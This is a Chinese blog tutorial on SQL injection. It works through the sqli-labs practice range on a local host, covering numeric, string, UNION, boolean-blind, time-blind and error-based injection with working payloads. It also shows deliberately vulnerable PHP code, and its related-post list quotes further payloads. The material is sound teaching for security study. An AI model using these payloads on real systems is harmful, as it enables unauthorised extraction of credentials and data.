SQL注入漏洞1

最新推荐文章于 2023-03-06 11:39:24 发布
最新推荐文章于 2023-03-06 11:39:24 发布
阅读量187 收藏
点赞数
分类专栏: web漏洞 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46085232/article/details/118444785
版权

SQL注入漏洞

漏洞原理

由于对用户输入数据的过滤不严格,导致攻击者将恶意代码(攻击载荷)拼接到sql语句中,并带入到后端数据库中执行。

SQL注入基础

实验环境:sqlilabs靶场(php+mysql)

数字型注入

先看一下关键代码(第二关)

include("../sql-connections/sql-connect.php");//包含数据库连接文件

$id=$_GET['id'];//GET方式接收用户的数据id

$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";//拼接sql执行语句
$result=mysql_query($sql);//将sql语句带入数据库执行
$row = mysql_fetch_array($result);//打印执行结果

通过网页访问连链接http://127.0.0.1/sqlilabs/Less-2/?id=1,结果如图
在这里插入图片描述
这里PHP将我们输入的id=1,通过GET方式接收,并赋值给变量id,再与sql的查询语句进行拼接,带入到数据库中执行,最终将结果返回给用户。(图中的sql语句是为了方便,打印出来的)
将SELECT * FROM users WHERE id=1 LIMIT 0,1直接在mysql命令行中执行,得到相同的结果,如下
在这里插入图片描述
那我们怎么知道这是数字型注入呢?答案通过数字运算。访问链接:http://127.0.0.1/sqlilabs/Less-2/?id=2-1;可以得到与访问链接:http://127.0.0.1/sqlilabs/Less-2/?id=1相同的结果。
在这里插入图片描述
从源代码也表现出来,sql语句中的$id没有被引号包裹。这时我们可以直接输入sql查询语句来干扰正常的查询。下面我们就引出第一种攻击方式union注入,即联合注入。

UNION注入

SELECT * FROM users WHERE id=1 union select id,username, password from users where id=2 ;
在这里插入图片描述
通过UNION查询,我们得到了id=1和id=2的用户数据,接下来我们浏览器中访问。
在这里插入图片描述
这里我们并没有看到id=2的用户数据,是因为PHP代码所决定的,我们可以通过limit来控制输出,‘limit 1,1’第一个1表示‘索引’,第一个1表示‘个数’,我们加上‘limit 1,1’访问。
在这里插入图片描述
这里我们就看到了id=2用户的数据,至于后面的–+(–%20),作用是注释后面的语句,同样作用的有“#(%23)”
或者指定id=-1或者一个很大的值,使得union前面的语句查询不到,这样就只有一条结果,访问http://127.0.0.1/sqlilabs/Less-2/?id=-1%20union%20select%20id,username,%20password%20from%20users%20where%20id=2
在这里插入图片描述

至此,第一个例子结束,数字型注入的关键在于找到输入的参数点(这也是所有注入类型的关键),在通过UNION注入等攻击手段,获取数据库的敏感信息。

字符型注入

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";//拼接sql执行语句

与数字型注入不同的是,$id被单引号包裹,让其变成了字符串。
在MySQL数据库中,等号两边如果类型不一样,则会发生强制转换。当数字跟字符串比较时,字符串将被转换成数字,再进行比较。如下图:
在这里插入图片描述
这也就不难解释,当访问http://127.0.0.1/sqlilabs/Less-1/?id=2-1,返回的是id=2用户的数据。当再访问http://127.0.0.1/sqlilabs/Less-1/?id=1a,返回的是id=1用户的数据,这里也说明的确是字符型。
在这里插入图片描述
在这里插入图片描述
讲到这里,相比数字型注入,字符型注入的攻击方式,需要考虑符号的闭合,(如将前面的单引号闭合,注释后面的单引号)
http://127.0.0.1/sqlilabs/Less-1/?id=-1%27%20union%20select%20id,username,%20password%20from%20users%20where%20id=2–+
在这里插入图片描述

盲注

如果sql执行后,没有回显,怎么办
在这里插入图片描述

虽然我们看不到数据,但是注入推测出数据,这种技术被称为盲注。盲注分为布尔盲注和时间盲注。

布尔盲注

布尔盲注就是利用MySQL自带的函数进行数据截取,来进行逻辑判断。
常见函数:
mid(a,b,c) #从位置b开始,截取a字符串的c位
substr(a,b,c) #从位置b开始,截取字符串a的c长度
left(database(),1),database() #left(a,b)从左侧截取a的前b位
length(database())=8 #判断数据库database()名的长度
ord=ascii ascii(x)=97 #判断x的ascii码是否等于97
等等。
通过访问http://127.0.0.1/sqlilabs/Less-8/?id=1%27%20and%20length(database())=8–+,页面显示正常,知道数据名的长度为8。
在这里插入图片描述
那这里假设我想知道id=2用户的数据,该怎么构造sql语句
?id=1’ and mid(select concat(username,0x7e,password) from users where id=2,1,1)=‘A’–+
在这里插入图片描述

时间盲注

布尔盲注是通过页面是否正常回显,来判断我们猜测的是否正确,那当页面回显的结果一样时,该肿么办,这里就引入了时间盲注。时间盲注又称延迟注入,它通过sleep()函数来控制回显时间,从而判断出猜测的是否正确。
相关函数:if,sleep()
?id=1’ and if((length(database())=8),sleep(5),1)–+
在这里插入图片描述

报错注入

为了方便开发者调试,有时会开启错误调试在这里插入图片描述
此时,只要触发sql语句的错误,即可在页面看到错误信息。这种攻击方式则是利用mysql会将语句执行后的报错信息输出,故成报错注入。
在这里插入图片描述
相关函数:floor,updatexml,extractvalue
这里不探究这些函数的原理。
?id=1 and updatexml(1,concat(0x7e,(version())),0)
?id=1 and extractvalue(1,concat(0x7e,database()))
在这里插入图片描述

在这里插入图片描述

总结

不要浮躁!!!

把小海蒂的名字还给我(师从小迪渗透)
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
国信安web安全——SQLi漏洞(一)
学习记录
02-28 589
一、熟悉SQL注入基础 (1)order by (2)Union (3)version() (4)database() (5)concat() (6)Concat_ws() (7)group_concat() (8)information_schema库 二、SQLi漏洞概念 SQL注入攻击包括通过输入数据从客户端插入或“注入”SQL查询到应用程序。一个成功的SQL注入攻击可以从数据库中获取敏感数据、修改数据库数据(插入/更新/删除)、执行数据库管理操作(如关闭数据库管理系统)、恢复存在于
实验吧简单的SQL注入三连击
wenake的博客
03-06 267
简单的sql注入1 检查注入点特征,发现对某些关键字有过滤 爆出所有的数据库名 双写绕过 方法1 http://ctf5.shiyanbar.com/423/web/?id=%27%20unionunion%20%20selectselect%20%20schema_name%20%20fromfrom%20%20information_schema.schemata%20wherewhere...
Web漏洞-SQL注入(上)
最新发布
Ays.Ie的博客
03-06 674
web漏洞-SQL注入(上)
SQL注入练习
热门推荐
单核CPU的小朋友的博客
12-20 3万+
第一关 题目链接:http://43.247.91.228:84/Less-1 首先进行注入点测试。 通过报错我们知道这个是mysql数据库,而且使用单引号闭合,后台语句估计是 Select username from ‘{$id}’; 然后我们使用order by测试数据库当前列数。 接下来使用union查询来判断页面可回显的点。 我们通过联合查询来查看数据库的名字以及一些信息。 命令:1...
SQL注入—二次注入
qidiandexiaowu
09-21 281
原理:用户向数据库里存入恶意的数据,在数据被插入到数据库之前,肯定会对数据库进行转义处理,但用户输入的数据的内容肯定是一点摸样也不会变的存进数据库里,而一般都默认为数据库里的信息都是安全的,查询的时候不会进行处理,所以当用户的恶意数据被web程序调用的时候就有可能出发SQL注入。 图解: 二次注入比普通的注入更难发现,很难被工具扫描出来。 原理大概知道了,接下来就是实战了 ...
1、SQL注入漏洞
sigali的博客
03-14 3007
1、SQL注入漏洞 1.1、SQL注入漏洞产生原因及危害 SQL注入漏洞是指攻击者通过浏览器或者其他客户端将恶意SQL语句插入到网站参数中,而网站应用程序未对其进行过滤,将恶意SQL语句带入数据库使恶意SQL语句得以执行,从而使攻击者通过数据库获取敏感信息或者执行其他恶意操作。 SQL注入漏洞可能会造成服务器的数据库信息泄露、数据被窃取、网页被篡改等!! 二级标题 三级标题 四级标题 五级标题 六级标题 。 ...
SQL注入漏洞
qq_43279943的博客
03-31 479
SQL注入漏洞漏洞原理注入类型漏洞检测单引号测试 漏洞原理 SQL注入是由于编辑代码的人员对用户提交参数没有进行一定的审核或者过滤机制不严格,导致用户可以对SQL语句进行重新构造,执行不在预期内的数据库命令,造成数据信息泄露的漏洞。 注入类型 SQL注入按照注入点参数分类通常分为字符型和数字型 字符型:select * from users where id = '1'; 数字型:select *...
xycms add_ad.php sql注入漏洞1
08-03
标题“xycms add_ad.php sql注入漏洞1”指出的是XYCMS企业建站系统中一个特定页面add_ad.php存在的SQL注入安全问题。XYCMS是一个PHP开发的网站内容管理系统,它分为动态版和静态版,主要服务于企业建站需求。在描述...
SQL注入漏洞全接触.ppt
11-15
* 使用1=1、1=2测试法来检测SQL注入漏洞。 * 根据返回的结果,可以判断是否可以注入。 * 可以使用单引号测试法来检测SQL注入漏洞,但是这种方法不一定准确。 五、 SQL注入漏洞的防御方法 * 对用户输入数据的合法性...
Axublog 1.1.0 c_login.php存在sql注入漏洞1
08-03
标题提及的"Axublog 1.1.0 c_login.php存在sql注入漏洞1"是一个针对PHP个人博客系统Axublog的安全漏洞。该漏洞源于代码中的SQL注入问题,允许恶意攻击者通过操纵输入数据,执行恶意SQL命令,从而获取数据库中的敏感...
xycms add_book.php sql注入漏洞1
08-03
为了演示这个SQL注入漏洞,我们可以构造一个特定的POST请求。以下是一个示例payload: ``` http://localhost/admin/add_book.php?act=ok title=11&ly_content=11&content=11' AND (select if(mid(user(),1,1)='r',...
S-CMS PHP v30存在SQL注入漏洞1
08-03
例如,一个成功的数据包会导致回显"20151019102732946.jpg",而错误的数据包则不会,这表明这是一个布尔型的SQL注入漏洞,攻击者可以通过返回结果的真伪来判断SQL语句的执行情况。 二、利用方法 攻击者可以编写POC...
SQLi-Labs 学习笔记(Less 1-10)
Onlyme的博客
03-11 1万+
点击打开链接http://blog.csdn.net/u012763794/article/details/51207833http://blog.csdn.net/u012763794/article/details/51361152http://blog.csdn.net/u012763794/article/details/51457142Less-1 基于错误的 - get 单引号 - 字...
Sqli-labs 查看源代码 1-20
foolisheddy
03-08 4706
Less-1 indexphp sqli-connectphp db-credsinc GET - 基于错误 - 单引号 - 字符型 Less-2 GET - 基于错误 - 整型 Less-3 基于错误 - 单引号变形 - 字符型 Less-4 基于错误 -双引号- 字符型 Less-5 Less-6 双注入-双引号-字符型 Less-7 单引号 双括号 非基于错误 Less-8 基于布尔 - 单引
小白入门SQL注入基础-基于Sqli-lab平台实战
DYBOY-程序开发&网络安全
06-08 4178
简介:SQL注入是一个常见的漏洞,在所有的安全防护统计数据儿结果中显示,SQL注入几乎占据网络攻击问题的60%左右,由此可见SQL注入漏洞是一种常见的WEB漏洞,了解SQL注入对于网络安全工作者或安全爱好者来说,是非常有必要,本文章主要通过sqli平台来具体阐述SQL注入漏洞产生的原因和利用方法。 0x00 SQL注入漏洞简介 有关SQL注入的各种定义阐述已经很多,大家可自行使用搜索引...
sql注入基础
weixin_52657559的博客
10-27 1552
sql注入
SQL注入漏洞-GET注入
HacHunter的博客
03-05 2921
SQL 注入是一种攻击方式,在这种攻击方式中,恶意代码被插入到字符串中,然后将该字符串传递到 SQL Server 的实例以进行分析和执行。任何构成 SQL 语句的过程都应进行注入漏洞检查,因为 SQL Server 将执行其接收到的所有语法有效的查询。一个有经验的、坚定的攻击者甚至可以操作参数化数据。 SQL 注入的主要形式包括直接将代码插入到与 SQL 命令串联在一起并使其得以执行的用户输入变量。一种间接的攻击会将恶意代码注入要在表中存储或作为元数据存储的字符串。在存储的字符串随后串连到一个动态 SQ
从2019极客大挑战sql题看sql注入
limenzzz的博客
04-07 1894
学了一段时间ctf后发现自己的基础还不是很扎实,于是打算记录一下学习过程,方便以后查看(归根结底还是太菜了_(:з」∠)_) 目录 1.easysql 2.babysql 1.easysql 直接使用万能密码发现语法出错,仔细看是引号要求双引号闭合(我是菜狗),闭合后输入得到flag。 另外附上常见万能密码表,防止以后出现过滤不知道怎么办。 sql注入之万能密码总结_無名之涟的博客-CSDN博客_sql万能密码 2.babysql ...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8418
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
SQL注入漏洞详解与防范
"SQL注入漏洞全接触:深入解析与防范" SQL注入是一种常见的网络安全问题,主要发生在基于B/S架构的应用程序中。当开发者在编写代码时未能充分验证用户输入的数据,攻击者可以通过输入恶意的SQL代码,使得应用程序...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值